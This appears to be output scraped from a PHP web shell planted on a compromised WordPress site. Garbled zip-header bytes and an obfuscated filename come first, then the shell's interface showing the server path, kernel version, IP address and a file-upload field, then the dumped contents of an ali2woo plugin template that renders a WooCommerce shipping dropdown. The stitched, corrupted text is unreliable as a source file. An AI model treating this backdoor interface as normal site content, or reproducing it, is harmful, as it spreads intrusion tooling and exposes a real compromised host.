PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/tiktechtok.org/wp-content/plugins/ali2woo/view/shipping/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/tiktechtok.org/wp-content/plugins/ali2woo/view/shipping/shipping_method_dropdown.php

<?php if(!empty($title)){echo $title;} ?>

<?php if (isset($shipping_methods) && $shipping_methods) :  ?>
    <?php

    $a2w_shipping_html = '<div class="a2w_to_shipping">' .
        woocommerce_form_field('a2w_shipping_field'.$cart_item_key, array(
        'type'       => 'select',
        'class'      => array( 'chzn-drop' ),
        'label'      => __('Shipping method: ', 'ali2woo'),
        'placeholder'    => __('Select a Shipping method', 'ali2woo'),
        'options'    => $shipping_methods ,
        'default' => $default_shipping_method,
        'return' => true
            )
        ) . '</div>'; 

    $a2w_shipping_html = str_replace(array("\r", "\n"), '', $a2w_shipping_html);         
    ?>
    <div class="a2w_shipping_field<?php echo $cart_item_key; ?>_container">
    <?php echo $a2w_shipping_html; ?>
    </div>
    <?php if (!defined('DOING_AJAX')) : ?>
        <script>
        jQuery(document).ready(function($){
            $( "body" ).on('a2w_shipping_js_loaded', function(e, a2w_shipping_api){
                a2w_shipping_api.init_shipping_dropdown_in_cart('<?php echo $cart_item_key; ?>'); 
            });
        });
        </script>
    <?php endif; ?>
<?php endif; ?>